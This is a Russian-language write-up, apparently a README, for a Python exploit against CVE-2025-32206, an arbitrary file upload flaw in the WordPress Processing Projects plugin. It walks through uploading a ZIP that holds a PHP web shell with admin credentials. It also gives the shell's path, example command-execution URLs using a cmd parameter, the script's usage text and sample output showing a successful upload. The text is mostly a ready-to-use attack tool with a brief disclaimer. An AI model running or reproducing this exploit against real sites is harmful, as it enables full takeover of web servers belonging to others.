
WordPress Processing Projects Plugin <= 1.0.2 уязвим для произвольной загрузки файлов
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H«Уязвимость неограниченной загрузки файлов опасного типа в LABCAT Processing Projects позволяет злоумышленникам загружать веб-шелл на веб-сервер. Это может привести к полной компрометации системы.»
Этот эксплойт на Python нацелен на сайты WordPress, использующие уязвимый плагин Processing Projects (версия <= 1.0.2). Плагин некорректно обрабатывает загрузку файлов от аутентифицированных пользователей, позволяя им загружать произвольные ZIP-файлы, содержащие исполняемый PHP-код (веб-шеллы).
Скрипт эксплойта:
Nxploited.zip), содержащий вредоносный PHP-шелл (Nxploit.php).http://target.com/wp-content/uploads/processing-projects/Nxploit.phpПосле успешной загрузки шелла его можно использовать для выполнения системных команд через параметр cmd. Примеры:
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=whoami
http://target.com/wp-content/uploads/processing-projects/Nxploit.php?cmd=ls
Этот шелл выполняет произвольные команды ОС и возвращает их вывод непосредственно в ответе.
usage: CVE-2025-32206.py [-h] -u URL -un USERNAME -p PASSWORD
Exploit for CVE-2025-32206 | By Nxploited (Khaled Alenazi)
options:
-h, --help show this help message and exit
-u, --url URL Target WordPress URL (e.g. http://target.com/wordpress)
-un, --username USERNAME WordPress admin username
-p, --password PASSWORD WordPress admin password
[+] CVE-2025-32206 | WordPress Processing Projects <= 1.0.2 - Arbitrary File Upload
[+] By Nxploited | Khaled Alenazi
[+] Created zip with shell: Nxploited.zip -> Nxploit.php
[+] Logged in successfully.
[+] Extracted form fields successfully.
[+] Upload request sent successfully.
[+] Shell executed at: http://target.com/wp-content/uploads/processing-projects/Nxploit.php
Этот скрипт предоставляется только в образовательных целях. Несанкционированное использование этого эксплойта на системах, которыми вы не владеете или на тестирование которых у вас нет явного разрешения, является незаконным и неэтичным.
Всегда следуйте практике ответственного раскрытия уязвимостей и используйте этот инструмент только в контролируемых средах или при наличии явного разрешения.
Автор: Nxploited | Khaled Alenazi